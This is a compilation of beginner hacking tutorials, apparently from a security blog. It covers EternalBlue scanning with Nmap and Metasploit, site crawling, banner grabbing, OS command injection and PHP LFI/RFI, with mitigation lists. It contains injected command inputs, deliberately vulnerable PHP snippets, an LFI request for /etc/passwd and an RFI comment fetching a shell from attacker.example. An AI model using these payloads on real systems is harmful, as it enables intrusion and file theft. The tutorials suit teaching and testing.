
3 Ways to Scan for the EternalBlue Vulnerability in a Remote PC

Hello Friends! As we all know, Microsoft Windows 7 is exploitable by EternalBlue through SMBv1. Microsoft patched this vulnerability by updating the SMB version, yet a large number of Windows 7 users still have not updated their systems. If a security tester wants to separate vulnerable systems from updated ones, he needs some way of scanning to identify the vulnerable systems.

Eternal scanner is a network scanner for the EternalBlue exploit, CVE-2017-0144.

Target: Windows 7
Attacker: Kali Linux

Open the terminal in your Kali Linux and type the following command to download it from GitHub.


git clone https://github.com/peterpt/eternal_scanner.git && cd eternal_scanner


Then, once it is successfully installed, you need to run the script in order to launch the scanner in the terminal by typing the following:
./escan

Once the scanner is launched inside the terminal, it will ask you to enter a target IP; you can also add a range of IPs for scanning.

We have given only a single IP for scanning, i.e. 192.168.1.106, as the target.

Then it will start scanning and dump those IPs which are vulnerable in the given IP range; from the screenshot you can observe it has dumped 192.168.1.106:445 as a vulnerable IP with SMB port 445 and saved the output inside /root/eternal_scanner/vulnr.txt.


When you open the output file you will observe the vulnerable IP as well as the name of the exploit, “MS17-010”, as shown in the given image.
Similarly, you can scan the target using Nmap and Metasploit.


NMAP

Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.

The script connects to the IPC$ tree, executes a transaction on FID 0 and checks if the error "STATUS_INSUFF_SERVER_RESOURCES" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems.
Tested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.

The following command will scan for SMB vulnerabilities using Nmap's built-in vulnerability scripts and report according to the output:
nmap -T4 -p445 --script vuln 192.168.1.106

You can observe from the given screenshot that port 445 is open and vulnerable. The target is exploitable via MS17-010; moreover, the risk rating is High, which means it can easily be exploited.


We can directly scan for the MS17-010 SMB vulnerability using the following Nmap script command:

nmap -T4 -p445 --script smb-vuln-ms17-010 192.168.1.106

From the given screenshot you will observe that it has scanned only for MS17-010 and found the target vulnerable to it.

From both Nmap results we conclude that the target is vulnerable because of Microsoft SMBv1.


METASPLOIT
Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user "\" and connect to IPC$.

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.106
msf auxiliary(smb_ms17_010) > set lhost 192.168.1.104
msf auxiliary(smb_ms17_010) > set rport 445
msf auxiliary(smb_ms17_010) > exploit

From the screenshot you can see that the host is vulnerable to MS17-010.
Great!!! Now use MS17-010 to exploit your target.

5 Ways to Crawl a Website


A Web crawler, sometimes called a spider, is an Internet bot that systematically browses the World Wide Web, typically for the purpose of Web indexing.

A Web crawler starts with a list of URLs to visit, called the seeds. As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit. If the crawler is performing archiving of websites, it copies and saves the information as it goes. The archive is known as the repository and is designed to store and manage the collection of web pages. A repository is similar to any other system that stores data, like a modern-day database.
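The loop described above is simple enough to sketch directly. The following is a minimal, illustrative PHP crawler, not one of the five tools covered below; the seed URL, the page cap and the naive link resolution are assumptions made for this example.

<?php
// Minimal crawler sketch: keep a queue seeded with start URLs, fetch each
// page, extract the href links and queue any URL not yet visited.
$queue = array('http://tptl.in/');       // seed list (example target)
$seen  = array();
while ($queue && count($seen) < 20) {    // cap the crawl for this sketch
    $url = array_shift($queue);
    if (isset($seen[$url])) continue;
    $seen[$url] = true;
    $html = @file_get_contents($url);    // fetch the page
    if ($html === false) continue;
    // collect every href="..." found in the page
    if (preg_match_all('/href="([^"#]+)"/i', $html, $matches)) {
        foreach ($matches[1] as $link) {
            // naive resolution: treat non-absolute links as relative to the seed
            if (strpos($link, 'http') !== 0) {
                $link = 'http://tptl.in/' . ltrim($link, '/');
            }
            if (!isset($seen[$link])) $queue[] = $link;
        }
    }
}
print_r(array_keys($seen));              // every URL the crawler visited
?>

A real crawler adds politeness (robots.txt, rate limiting), proper URL resolution and a persistent repository; the tools below handle all of that for you.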

Let’s Begin!!
Metasploit
This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.

msf > use auxiliary/crawler/msfcrawler
msf auxiliary(msfcrawler) > set rhosts www.tptl.in
msf auxiliary(msfcrawler) > exploit



From the screenshot you can see it has loaded the crawler in order to extract hidden files from the website, for example about.php, the jQuery contact form, HTML files and so on, which is not possible to extract manually from a website using a browser. We can use it for information gathering on any website.


HTTRACK
HTTrack is a free and open-source Web crawler and offline browser, developed by Xavier Roche.
It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link structure.

Type the following command inside the terminal:
httrack http://tptl.in -O /root/Desktop/file

It will save the output inside the given directory /root/Desktop/file.


From the given screenshot you can observe that it has dumped the website's information inside that directory, consisting of HTML files as well as JavaScript and jQuery.


BLACK WIDOW
This Web spider utility detects and displays detailed information for a user-selected Web page, and it offers other Web page tools.
BlackWidow's clean, logically tabbed interface is simple enough for intermediate users to follow but offers just enough under the hood to satisfy advanced users. Simply enter your URL of choice and press Go. BlackWidow uses multithreading to quickly download all files and test the links. The operation takes only a few minutes for small Web sites.

You can download it from here.

Enter your URL http://tptl.in in the Address field and press Go.


Click on the Start button on the left side to begin URL scanning, and select a folder to save the output file.
From the screenshot you can observe that I browsed to C:\Users\RAJ\Desktop\tptl in order to store the output file inside it.


When you open the target folder tptl you will get the entire data of the website: images, content, HTML files, PHP files and JavaScript are all saved in it.


WEBSITE RIPPER COPIER

Website Ripper Copier (WRC) is an all-purpose, high-speed website downloader software to save website data. WRC can download website files to local drive for offline browsing, extract website files of a certain size and type, like image, video, picture, movie and music, retrieve a large number of files as a download manager with resumption support, and mirror sites. WRC is also a site link validator, explorer, and tabbed anti pop-up Web / offline browser.

Website Ripper Copier is the only website downloader tool that can resume broken downloads from HTTP, HTTPS and FTP connections, access password-protected sites, support Web cookies, analyze scripts, update retrieved sites or files, and launch more than fifty retrieval threads.

You can download it from here.

Choose the “web sites for offline browsing” option.


Enter the website URL as http://tptl.in and click on Next.


Mention the directory path to save the output result and click Run Now.

When you open the selected folder tp you will find the fetched CSS, PHP, HTML and JS files inside it.


BURP SUITE SPIDER
Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.
For more detail, read our previous articles from here.
From the given screenshot you can observe that I have fetched the HTTP request of http://tptl.in; now send it to the Spider with the help of the Action tab.


The targeted website has been added inside the site map under the Target tab as a new scope for web crawling. From the screenshot you can see it has started web crawling of the target website, where it has collected the website's information in the form of PHP, HTML and JS files.

5 Ways of Banner Grabbing

A banner is a text message received from a host. Banners usually contain information about a service, such as the version number.
Banner grabbing is a process of collecting details about a remote PC on a network and the services running on its open ports. An attacker can make use of banner grabbing to discover network hosts and the services running on their open ports, with their versions, as well as the operating system, so that he can exploit them.
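Before looking at the individual tools, it is worth seeing how little is involved: a banner grab is just a TCP connection followed by a read. The sketch below is a minimal PHP illustration; the host and port are example values, and it only covers services (such as SSH, FTP and SMTP) that send their banner as soon as you connect.

<?php
// Minimal banner grab: connect to a TCP port and print whatever the
// listening service sends first.
$host = '192.168.1.106';   // example target
$port = 22;                // example port (SSH)
$sock = @fsockopen($host, $port, $errno, $errstr, 5);   // 5-second connect timeout
if (!$sock) {
    die("Connection failed: $errstr ($errno)\n");
}
stream_set_timeout($sock, 5);   // don't hang on services that stay silent
echo fgets($sock, 1024);        // e.g. "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1"
fclose($sock);
?>

Each of the five tools below automates some variant of this, adding probes for services that only respond after being spoken to.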


Nmap
A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds.
The banner will be shortened to fit into a single line, but an extra line may be printed for every increase in the level of verbosity requested on the command line.

Type the following command, which will fetch the banner for every open port on the remote PC.
nmap -sV --script=banner 192.168.1.106

From the screenshot you can read the services and their versions for the open ports, fetched by the Nmap banner script for the target 192.168.1.106.


The following command will grab the banner for a selected port, i.e. 80, for the HTTP service and its version.
nmap -Pn -p 80 -sV --script=banner 192.168.1.106
As a result it will dump “http-server-header: Apache/2.2.8 (Ubuntu) DAV/2”.


CURL
curl -I performs a HEAD request in order to show document information only; type the following command to grab the HTTP banner of the remote PC.
curl -s -I 192.168.1.106 | grep -e "Server: "
As a result it will dump “Server: Apache/2.2.8 (Ubuntu) DAV/2”.


TELNET
Type the following command to grab the SSH banner of the remote PC.
telnet 192.168.1.106 22
As a result it will dump “SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1”.

NETCAT
Type the following command to grab the SSH banner of the remote PC.
nc -v 192.168.1.106 22
As a result it will dump “SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1”.

DMITRY
DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux Command Line Application coded in C. DMitry has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more.

dmitry -b is used for banner grabbing on all open ports; type the following command to grab the banners of the remote PC.

dmitry -b 192.168.1.106
From the screenshot you can see it has shown banners for open ports 21, 22, 23 and 25.
In this way an attacker can grab the services and their versions for the open ports on a remote PC.

Beginner Guide to OS Command Injection

Dynamic Web applications may use scripts to call up functionality in the command line on the web server to process input received from the client, and unsafe user input may lead to OS command injection. OS command injection, also referred to as shell injection, is an attack that arises when an attacker tries to perform system-level commands through a vulnerable application in order to retrieve information from the web server or to gain unauthorized access to the server.

Impact Analysis
Impact: Critical
Ease of Exploitability: Medium
Risk Rating: High


In this attack the attacker injects unwanted system-level commands so that he can fetch information about the web server; for example: ls, whoami, uname -a, etc.


Let’s consider a scenario where a web application allows a user to PING the IP of another user so as to confirm that the host connection is alive. The given screenshot makes clear what the output will be when a host IP is submitted.
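To make the scenario concrete, a vulnerable handler behind such a PING form might look like the hypothetical sketch below; the parameter name ip and the use of shell_exec are assumptions for illustration, not taken from the application in the screenshots.

<?php
// Hypothetical vulnerable ping handler: the 'ip' parameter is passed to
// the shell without any sanitization, so input such as
// "192.168.1.106; id" (Linux) or "192.168.1.106 & dir" (Windows)
// appends a second, attacker-chosen command.
$ip = $_GET['ip'];
// '-c 2' limits the ping count on Linux; a Windows app would call ping directly
echo "<pre>" . shell_exec("ping -c 2 " . $ip) . "</pre>";
?>

Because the user input is concatenated straight into the command line, every shell metacharacter discussed below becomes a way to smuggle in a second command.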

Verify parameters to inject data

The following parameters should be tested for command injection flaws, as the application may be using one of these parameters to build a command on the web server:

·         GET: In this method, input parameters are sent in the URL.
·         POST: In this method, input parameters are sent in the HTTP body.
·         HTTP headers: Applications frequently use header fields to identify end users and display requested information to the user based on the value in the headers.
Some of the important header fields to check for command injection are:
·         Cookie
·         X-Forwarded-For
·         User-Agent
·         Referer

METACHARACTERS
Using a vulnerability scanner, the attacker comes to know that the current web application is vulnerable to command injection, and he tries injecting unwanted system-level commands using metacharacters.

Metacharacters are symbolic operators which are used to separate the actual command from the unwanted command. The ampersand (&) is used as a separator that divides the authentic input from the command that you are trying to inject.

This becomes clearer in the following image, where the attacker injects his payload dir using a metacharacter in order to retrieve the present directory of the web server.

As a result it dumps the following output, as shown in the given image, since the application has not validated the malicious user input.


OS Command Injection Operators

The developer may have set filters to block some metacharacters. These would block our injected data, and thus we need to experiment with other metacharacters too, as shown in the following table:
Operator    Description
;           The semicolon is the most common metacharacter used to test an injection flaw. The shell runs all the commands in sequence, separated by the semicolons.
&           It separates multiple commands on one command line. It runs the first command and then the second command.
&&          It runs the command following && only if the preceding command is successful.
||          It runs the command following || only if the preceding command fails.
|           The pipe redirects the standard output of the first command to the standard input of the second command.
``          The unquoting metacharacter (backticks) forces the shell to interpret and run the command between the backticks. For example: variable="OS version `uname -a`" && echo "$variable"
()          It is used to nest commands.
#           It is used as a command-line comment.

Steps to exploit – OS Command Injection
Step 1: Identify the input field
Step 2: Understand the functionality
Step 3: Try the ping method to introduce a time delay
Step 4: Use various operators to exploit OS command Injection

Types of Command Injection

Error-based injection: When an attacker injects a command through an input parameter and the output of that command is displayed on the web page, it proves that the application is vulnerable to command injection. The displayed result might be in the form of an error or the actual output of the command that you tried to run. The attacker then modifies and adds additional commands, depending on the shell on the web server, and assembles information from the application.

Blind injection: The results of the commands that you inject are not displayed to the attacker and no error messages are returned; it is similar to blind SQL injection. The attacker has to use another technique, such as injecting a command that causes a measurable time delay, to identify whether the command was really executed on the server.



Mitigation-OS Command Injection

·         Strong server-side validation
·         Implement a whitelist
·         OS hardening
·         Use built-in APIs for interacting with the OS if needed. More secure!!
·         Prevent the application from calling OS commands directly

Beginner Guide to File Inclusion Attack (LFI/RFI)

You can insert the content of one PHP file into another PHP file before the server executes it, with the include() function. The function can be used to create functions, headers, footers or elements that will be reused on multiple pages.

This helps developers make it easy to change the layout of a complete website with minimal effort.

If any change is required, then instead of changing thousands of files you just change the included file.

Assume we have a standard footer file called "footer.php" that looks like this:


echo "Copyright © 2010-" . date("Y") . " hackingartices.in
";
?>

To include the footer file in a page, use the include statement:

<html>
<body>

<h1>Welcome to Hacking Articles</h1>
<p>Some text.</p>
<p>Some more text.</p>
<?php include 'footer.php'; ?>

</body>
</html>

Example 2

Assume we have a file called "vars.php", with some variables defined:

<?php
$color='red';
$car='BMW';
?>

Then, if we include the "vars.php" file, the variables can be used in the calling file:

<html>
<body>

<h1>Welcome to my home page!</h1>
<?php
include 'vars.php';
echo "I have a $color $car.";
?>

</body>
</html>

Output: I have a red BMW.


PHP Require Function
The require statement is also used to include a file into the PHP code.
However, there is one big difference between include and require; when a file is included with the include statement and PHP cannot find it, the script will continue to execute:
Example 3




<html>
<body>

<h1>Welcome to my home page!</h1>
<?php
include 'noFileExists.php';
echo "I have a $color $car.";
?>

</body>
</html>

Output: I have a
If we do the same example using the require statement, the echo statement will not be executed, because the script execution dies after the require statement returns a fatal error:




<html>
<body>

<h1>Welcome to my home page!</h1>
<?php
require 'noFileExists.php';
echo "I have a $color $car.";
?>

</body>
</html>

No output result.



PHP require_once Function

The require_once() statement works the same way as require, but it is used when the called file might otherwise be included more than once. The only difference between require and require_once is that if the file has already been included, the calling script ignores further inclusions.

Example 4
echo.php

<?php
echo "Hello";
?>

test.php

<?php
require('echo.php');
require_once('echo.php');
?>

Output: "Hello" (the require_once call is ignored because echo.php has already been included)

Note
allow_url_include is disabled by default. If allow_url_fopen is disabled, allow_url_include is also disabled.

You can enable allow_url_include from php.ini:

/etc/php7/apache2/php.ini
allow_url_include = On


File Inclusion Attacks

It is an attack that allows an attacker to include a file on the web server through a PHP script. This vulnerability arises when a web application lets the client submit input that controls which files are included, or upload files to the server.

This can lead to the following attacks:

·         Code execution on the web server
·         Cross-Site Scripting (XSS)
·         Denial of Service (DoS)
·         Data manipulation attacks

Two Types:
Local File Inclusion
Remote File Inclusion

Local File Inclusion (LFI)


A local file inclusion vulnerability occurs when a file to which the PHP account has access is passed as a parameter to the PHP function “include” or “require_once”.


This vulnerability occurs, for example, when a page receives as input the path to the file that has to be included, and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.
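In code, the vulnerable pattern is typically a single unsanitized include. The sketch below is a hypothetical example; the page parameter simply mirrors the DVWA URLs shown next.

<?php
// Hypothetical vulnerable include: 'page' is used as-is, so
// ?page=../../../../etc/passwd traverses out of the web root (LFI), and
// ?page=http://attacker.example/shell.txt becomes remote file inclusion
// when allow_url_include is enabled.
include($_GET['page']);
?>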

Example – Local File Inclusion

http://192.168.1.8/dvwa/vulnerabilities/fi/?page=file1.php


http://192.168.1.8/dvwa/vulnerabilities/fi/?page=/etc/passwd


Read the complete local file inclusion attack tutorial from here.

Remote File Inclusion (RFI)

Remote file inclusion occurs when the URI of a file located on a different server is passed as a parameter to the PHP function “include”, “include_once”, “require” or “require_once”. PHP incorporates the content into the page; if the content happens to be PHP source code, PHP executes the file.

PHP remote file inclusion allows an attacker to embed his own PHP code inside a vulnerable PHP script, which may lead to disastrous results such as allowing the attacker to execute remote commands on the web server, deface parts of the website, or even steal confidential information.

http://192.168.1.8/dvwa/vulnerabilities/fi/?page=file1.php
http://192.168.1.8/dvwa/vulnerabilities/fi/?page=http://google.com


Read the complete remote file inclusion attack tutorial from here.

Mitigation
·         Strong input validation
·         A whitelist of acceptable inputs
·         Reject any input that does not strictly conform to specifications
·         For filenames, use stringent whitelists that limit the character set that can be used
·         Exclude directory separators such as “/”
·         Use a whitelist of allowable file extensions
·         Environment hardening
·         Develop and run your code on the most recent version of PHP available
·         Configure your PHP applications so that they do not use register_globals
·         Set allow_url_fopen to false, which limits the ability to include files from remote locations
·         Run your code using the lowest privileges possible
·         Use a vetted library or framework that does not allow this weakness

https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
https://www.acunetix.com